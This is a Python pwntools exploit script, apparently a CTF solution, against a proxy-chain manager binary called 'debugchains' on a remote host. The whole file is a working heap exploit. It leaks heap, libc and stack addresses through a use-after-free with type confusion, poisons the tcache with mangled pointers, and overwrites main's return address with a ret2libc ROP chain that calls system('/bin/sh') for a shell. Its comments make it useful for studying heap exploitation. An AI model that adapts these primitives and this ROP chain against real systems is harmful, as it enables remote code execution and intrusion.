#!/usr/bin/env python
from pwn import *

HOST = "89.169.156.185"
PORT = 12942
context.aslr = False

exe = context.binary = ELF("./debugchains_patched", checksec=False)
libc = ELF('./libc.so.6', checksec=False)
ld = ELF('./ld-linux.so', checksec=False)
context.terminal = "kitty @ launch --location=before --cwd=current --bias=65".split()
context.log_level = "debug"
context.encoding = "ascii"


def start(argv=[], *a, **kw):
    if args.ASLR:
        context.aslr = True

    if args.GDB or args.DBG:
        return gdb.debug([exe.path], gdbinit, *a, **kw)
    elif args.REMOTE:
        return remote(os.environ.get("HOST", HOST), int(os.environ.get("PORT", PORT)))
    elif args.DOCKER:
        return remote("localhost", 17173)
    return process([exe.path], *a, **kw)


# template end

CHAINS_MAX_CNT = 32
PROXIES_MAX_CNT = 64
HOSTNAME_SIZE = 128
MAX_CHAIN_SIZE = 16

# you can put a default value in fgets_size
def fgets_send(data, fgets_size=HOSTNAME_SIZE, newline=True, padding=b'\x00'):
	if len(data) >= fgets_size:
		print("fgets_send: fgets will cut off your data (len >= dest_size)")
		exit()

	if data[-1] == b'\n':
		if not newline:
			p.send(data)
			return
		else:
			print("fgets_send: you want padding (newline=False) but your data ends in a \\n ?")
			exit()

	if b'\n' in data:
		print("fgets_send: fgets will cut off your data (\\n in the middle)")
		exit()

	if newline:
		p.sendline(data)
	else:
		data = data.ljust(fgets_size - 1, padding)
		p.send(data)

def add_proxy(hostname, port=0x1337):
    p.sendlineafter(b'> ', b'1')
    
    proxyid = -1
    for i in range(PROXIES_MAX_CNT):
        if proxies[i] == 0:
            proxyid = i
            break
    assert(proxyid != -1)

    p.recvuntil(b'[?] Enter proxy hostname: ')
    fgets_send(hostname)

    p.sendlineafter(b'[?] Enter proxy port: ', str(port).encode())
    proxies[i] = 1
    return proxyid

def delete_proxy(idx):
    p.sendlineafter(b'> ', b'2')
    p.sendlineafter(b'id: ', str(idx).encode())
    proxies[idx] = 0

def add_chain(proxylist):
    p.sendlineafter(b'> ', b'3')
    for i in range(CHAINS_MAX_CNT):
        if chains[i] == 0:
            chainid = i
            break
    assert(chainid != -1)

    p.sendlineafter(b'size: ', str(len(proxylist)).encode())
    for id in proxylist:
        p.sendlineafter(b'id: ', str(id).encode())
    
    chains[i] = 1
    return chainid

def view_chain(idx):
    p.sendlineafter(b'> ', b'4')
    p.sendlineafter(b'id: ', str(idx).encode())

def delete_chain(idx):
    p.sendlineafter(b'> ', b'5')
    p.sendlineafter(b'id: ', str(idx).encode())
    chains[idx] = 0

def pexit():
    p.sendlineafter(b'> ', b'6')

def mangle_ptr(next_ptr: int, ptr_loc: int) -> int:
    return (next_ptr) ^ (ptr_loc >> 12)

gdbinit = """
break main
break 235
break 280
continue
""".format(**locals())

proxies = [0] * PROXIES_MAX_CNT
chains = [0] * CHAINS_MAX_CNT

p = start()

# ==== HEAP LEAK ====
victim = add_proxy(b'uaf victim')
dangling = add_chain([victim])
# something to put into the new chain, as it has to contain at least one proxy
fill = add_proxy(b'something')
# put proxy in tcache (there is still a pointer to it in dangling)
delete_proxy(victim)
# take the "proxy" chunk out that and "replace it" with a chain for chain
# overwrite .hostname with chain's .proxy
# dangling is still pointing to this
overlapping_proxy_chunk = add_chain([fill])   
view_chain(dangling)

p.recvuntil(b'proxy #0 is ')
heap = unpack(p.recvuntil(b':0\n', drop=True).ljust(8, b'\x00')) - 0x390
print("== HEAP: ", hex(heap))

# ==== ARBITRARY READ ON UNSORTED -> LIBC LEAK ====

# prepare for filling the tcache
# 6 proxies + 1 chain = 7
tcache_arr = []
for x in range(6):
    tcache_arr.append(add_proxy(b't'))
tcache_chain = add_chain(tcache_arr)
# our arbitrary read target:
unsorted = add_proxy(b'unsorted hostname')
leak_target = heap + 0x9f0 # we figure the offset out by checking in the debugger

# A proxy we won't ever free, so we won't have to worry
# about it being corrupted. Will use it to make chains
# that are needed for tcache emptying
safe_proxy = add_proxy(b'safe')

# chunks needed for the arbitrary read
victim = add_proxy(b'uaf victim')
first_free = add_chain([victim])
fill = add_proxy(b'something')

# fill the tcache (7 chunks)
delete_chain(tcache_chain)
# put the target into the unsorted bin
delete_proxy(unsorted)

# empty out the tcache bin
for i in range(7):
    # making chains here instead of proxies
    # so we don't run out of proxy indexes
    add_chain([safe_proxy])

# arbitrary read logic:

# this will also free victim
delete_chain(first_free)
# the 0x20 tcache bin is now:
# 0x20 [  2]: 0x55555555c350 (first_free) —▸ 0x55555555c2a0 (victim) ◂— 0
# take the first_free chain out of the tcache
add_proxy(b'whatever')
# take the victim proxy out of the tcache, alloated as a chain
type_confused = add_chain([fill])
# free the type confused chunk again
# (this isn't double free, we just allocated it^)
# (this will also free 'fill' btw)
delete_proxy(victim)
# Setting the .hostname (.proxy) as the address of the target
# Setting the .port (.next) as zero so we break out of the loop when printing the chain
proxy_over_chain = add_proxy(pack(leak_target), 0)

view_chain(type_confused)

# parse the libc leak
p.recvuntil(b'is ')
libc.address = unpack(p.recvuntil(b':1', drop=True).ljust(8, b'\x00')) - 0x203b20
print("== LIBC: ", hex(libc.address))

# ==== ARBITRARY READ OF ENVIRON -> STACK LEAK ====

# The heap state isn't clean now, but since both the tcache
# and fastbins are take-from-front (stack-like) we don't
# really care.

leak_target = libc.sym['environ']

# Arbitrary read, same as before
victim = add_proxy(b'uaf victim')
first_free = add_chain([victim])
fill = add_proxy(b'something')

delete_chain(first_free)
add_proxy(b'whatever')
type_confused = add_chain([fill])
delete_proxy(victim)
proxy_over_chain = add_proxy(pack(leak_target), 0)

view_chain(type_confused)

# parse the stack leak
p.recvuntil(b'is ')
stack = unpack(p.recvuntil(b':1', drop=True).ljust(8, b'\x00'))
print("== STACK: ", hex(stack))

# ==== TCACHE POISON ====

# Need to allocate a chunk now which I
# can free later to increase the chunk count
# for the 0x90 tcache bin which will allow 
# the poison to happen.
tcache_count_inc = add_proxy(b'tcache +1')

# This address is the address of
# victim's hostname + 0x20
fake_chunk_addr = heap + 0xb70

# reallocate-chain-as-proxy primitive, like before
victim = add_proxy(b'uaf victim')
first_free = add_chain([victim])
fill = add_proxy(b'something')

delete_chain(first_free)
add_proxy(b'whatever')
type_confused = add_chain([fill])

delete_proxy(victim)
# Setup fake chunk
proxy_over_chain = add_proxy(flat(
    pack(fake_chunk_addr),
    0,
    0,
    0x91,
), 0)

# Increase tcache count for the 0x90 bin
delete_proxy(tcache_count_inc)

# The victim->hostname (i.e. proxy_over_chain->hostname)
# will be freed, along with the fake chunk inside it
delete_chain(type_confused)
# now we have overlapping tcache chunks

# Using tcache poison for ROP
# address of return address from main
target_addr = stack - 0x138

# Take the victim->hostname out
# and set the fd pointer of the fake chunk
add_proxy(flat(
    0, 0,
    0, 0x91,
    mangle_ptr(target_addr, fake_chunk_addr)
))

# take out the fake chunk
add_proxy(b'whatever')

# ROP gadgets
pop_rdi = libc.address + 0x001ae710
ret = libc.address + 0x00152a63

# ret2libc overwrite return address
add_proxy(flat(
    0x0,                # chunk alignment
    pop_rdi,
    next(libc.search(b'/bin/sh')),
    ret,                # stack alignment
    libc.sym['system']
))

# Exit the program, triggering the ROP chain
p.sendlineafter(b'> ', b'6')

p.interactive()
p.close()
